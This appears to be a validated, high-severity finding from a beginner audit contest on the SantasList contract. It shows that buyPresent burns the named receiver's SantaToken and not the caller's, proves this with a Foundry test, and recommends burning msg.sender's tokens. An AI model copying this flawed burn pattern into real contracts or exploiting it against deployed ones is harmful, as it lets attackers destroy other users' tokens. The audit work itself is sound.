Beginner FriendlyFoundry
100 EXP
View results
Submission Details
Severity: high
Valid

Wrong burn address in `StantasList::buyPresent makes it possible that anyone can burn another address SantaToken and receive a present NFT

Summary

Any address is able to call buyPresent(address presentReceiver) and use presentReceiver's SantaToken to burn and get a present for free.

Vulnerability Details

function buyPresent(address presentReceiver) external {
@>> i_santaToken.burn(presentReceiver);
_mintAndIncrement();
}

Impact

function testCanBuyPresentWithAnotherAddressesToken() public {
// Santa gives userToGetBurned address the EXTRA_NICE status and therefore the ability
// to collect a NFT and SantaToken.
vm.startPrank(santa);
santasList.checkList(userToGetBurned, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(userToGetBurned, SantasList.Status.EXTRA_NICE);
vm.stopPrank();

    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

    // userToGetBurned address collectsPresent and SantaToken
    vm.startPrank(userToGetBurned);
    santasList.collectPresent();
    uint256 balanceUserToGetBurnedTokenBefore = santaToken.balanceOf(userToGetBurned);
    vm.stopPrank();
    vm.startPrank(user);
    // user address buys present with userToGetBurned tokens
    santasList.buyPresent(userToGetBurned);
    vm.stopPrank();
    uint256 balanceUserToGetBurnedAfter = santaToken.balanceOf(userToGetBurned);
    // santaToken mint for EXTRA_NICE addresses is 1e18 and "cost" burn is 1e18 as well
    assertEq(balanceUserToGetBurnedAfter, balanceUserToGetBurnedTokenBefore - 1e18);
}

Tools Used

  • Foundry

Recommendations

i_santaToken.burn(presentReceiver) should be modified to `i_santaToken.burn(msg.sender) so that the caller is burning his own tokens and is not able to burn someone elses.
Furthermore would it be useful to transfer the NFT to the present receiver right away

Updates

Lead Judging Commences

inallhonesty Lead Judge
over 1 year ago
inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

buyPresent should use msg.sender

Current implementation allows a malicious actor to burn someone else's tokens as the burn function doesn't actually check for approvals.

buyPresent should send to presentReceiver

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.